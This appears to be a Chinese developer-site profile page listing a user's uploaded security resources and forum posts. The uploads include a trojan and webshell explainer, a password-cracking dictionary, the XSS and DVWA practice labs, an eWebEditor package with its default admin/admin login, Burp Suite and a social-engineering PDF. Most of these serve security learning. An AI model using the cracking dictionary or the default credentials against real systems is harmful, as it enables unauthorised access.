木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全运行。   小马体积小,容易隐藏,隐蔽性强。大马体积比较大,功能多,危害大。

2020-03-10

passwod_17000.txt

密码字典,是配合密码破译软件所使用的。密码字典里包括许多人们习惯性设置的密码,这样可以提高密码破译软件的密码破译成功率和命中率,缩短密码破译的时间。 如果一个人密码设置没有规律或很复杂,未包含在密码字典里,这个字典就没有用了,甚至会延长密码破译所需要的时间。

2020-03-03

typecho.tar.gz

关于 名称的来历 Typecho 是由 type 和 echo 两个词合成的,来自于开发团队的头脑风暴。 Type,有打字的意思,博客这个东西,正是一个让我们通过打字,在网络上表达自己的平台。Echo,意思是回声、反馈、共鸣,也是PHP里最常见、最重要的函数,相信大部分PHP爱好者都是从 echo 'Hello,world!'; 开始自己的PHP编程之路的。 名称就表明 Typecho 是一款博客程序,它在 GPL version 2 许可证下发行,基于 PHP (需要 PHP5 以上版本)构建,可以运行在各种平台上,支持多种数据库(Mysql, PostgreSQL, SQLite)。 为什么开发 Typecho 源自开发团队在精神层面上的洁癖和狂热。在使用博客程序的大部分时间里,我们只是发几段文字,贴几张图片,不需要高级复杂的系统,需要的是一个简单快速的博客平台。在流行的开源程序中,满足我们要求的很少,于是我们决定自己动手,开发一款有性格的博客程序,并用开源协议发行。 开发团队中的几个人都是 IT 从业者,在成长的过程中从开源世界里获益匪浅,这个项目也是我们对开源的一个回报。 如何参与开发 Typecho Typecho 目前使用 Git 来控制程序版本,如果你想为 Typecho 贡献源代码,最好先弄明白 Git 的使用方法。我们目前把项目托管在 GitHub 上,任何 GitHub 用户都可以向我们贡献代码。 参与的方式很简单,【Fork】一份 Typecho 的代码到你的仓库中,修改后提交,并向我们发起【Pull Request】申请,我们会及你的申请并及时对代码进行审查。审查通过后,你的代码将被【Merge】进我们的仓库中,这样你就会自动出现在贡献者名单里了,非常方便。

2020-03-03

xss闯关小游戏.zip

这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载

2020-02-25

DVWA-安全测试靶场.zip

Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。 它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是 实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。 一般的用法说明 它取决于用户如何DVWA方法。 要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。 没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。 请注意,有 记录和无证的弱点 用这个软件。 这是故意的。 你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。 这将演示如何添加另一层的安全可能会阻止某些恶意行为。 注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。 还有额外的链接进一步背景阅读,这涉及到安全问题。

2020-02-19

ewebeditor编辑器.rar

ACCESS数据库的后台管理编辑器 ======================================================================================================== eWebEditor ASP版,使用ACCESS配置数据库,带后台管理。为保证安全,强烈建议用户开始使用就修改后台管理用户及密码。 结构说明 ============================= admin : 后台管理相关图片 buttonimage : 按钮图片 css : 样式文件 db : 数据库文件 dialog : 对话框相关文件 example : 例子 include : 公用包含文件 sysimage : 系统图片 uploadfile : 默认的上传文件 安装=============================1、解开压缩包,直接拷贝到站点或建虚拟;2、访问例子文件,看是否运行正常: 1) eWebEditor 标准调用和弹窗调用示例: http://127.0.0.1/ewebeditor/example/test1.asp 2) eWebEditor 远程文件上传示例: http://127.0.0.1/ewebeditor/_example/test2.asp3、如果显示正常信息,即表示安装已完成! 使用=============================1、后台管理 地址:http://127.0.0.1/ewebeditor/admin_default.asp 默认登录用户:admin 默认登录密码:admin ======================================================================================================== ╭═══════════════╮ ║ ║ ╭══════┤ ├══════╮ ║ ║ 单机游戏网 ║ ║ ║ ║ ║ ║ ║ ╰═══════════════╯ ║ ║ ║ ║声明: ║ ║ 1) 本站不保证所提供软件或程序的完整性和安全性。 ║ ║ 2) 请在使用前查毒。 ║ ║ 4) 转载本站提供的资源请勿删除本说明文件。 ║ ║ 5) 本站提供的程序均为网上搜集,如果该程序涉及或侵害到您║ ║ 的版权请立即写信通知我们。 ║ ║ 6) 本站提供软件只可供研究使用,请在下载24小时内删除, ║ ║ 切勿用于商业用途,由此引起一切后果与本站无关。 ║ ║ ║ ║ 1. 推荐使用:WinRAR V3.2以上版本解压本站软件 ║ ║ ║ ║ ║ ║ ║ ║ ╭───────────────────────╮ ║ ╰══┤ ├══╯ ╰───────────────────────╯

2020-02-17

C32Asm_setup.zip

C32ASM静态反汇编工具功能概述 C32Asm现具有如下功能: 快速静态反汇编PE格式文件(Exe、Dll等) 提供Hex文件编辑功能,功能强大 提供内存Dump、内存编辑、PE文件Dump、PE内存ImageSize修正等多种实用功能 提供内存反汇编功能,提供汇编语句直接修改功能,免去OPCode的直接操作的繁琐 提供反汇编语句彩色语法功能,方便阅读分析,能方便自定义语法色彩 提供输入表、输出表、参考字符、跳转、调用、PE文件分析结果等显示 提供方便的跳转、调用目标地址的代码显示 提供汇编语句逐字节分析功能,有助于分析花指令等干扰代码 提供对ord调用和非ord调用的import自定义解析功能 提供PE文件格式的分析显示功能 提供文件拖放功能,直接可以进行文件反汇编或编辑 提供主文件命令行模式,方便加入右键菜单进行快速的文件操作 提供快速书签定位,多行代码复制,代码注释功能

2020-02-15

BurpSuite.zip

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

2020-02-13

社会工程学_百度百科.pdf

这是对社会工程学的详细解答,它主要讲解了社会工程学的起源、主要内容、社工手段、防御手段四个方面并配有详细的解答

2020-02-06

谁能教我iapp怎么用

发表于 2020-03-30 最后回复 2020-03-30

优秀小版主是什么?我想要一个,帮帮我

发表于 2020-02-26 最后回复 2020-02-26

热门文章数据更新不及时

发表于 2020-02-06 最后回复 2020-02-06

中国大陆人口已突破14亿——你是比以前更渺小了,还是被更多人所敬仰了?

发表于 2020-01-17 最后回复 2020-01-19

一个高中学历,初学网安的退伍军人入行有多难

发表于 2020-01-04 最后回复 2020-01-05

手机安装linux

发表于 2020-01-03 最后回复 2020-01-03

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除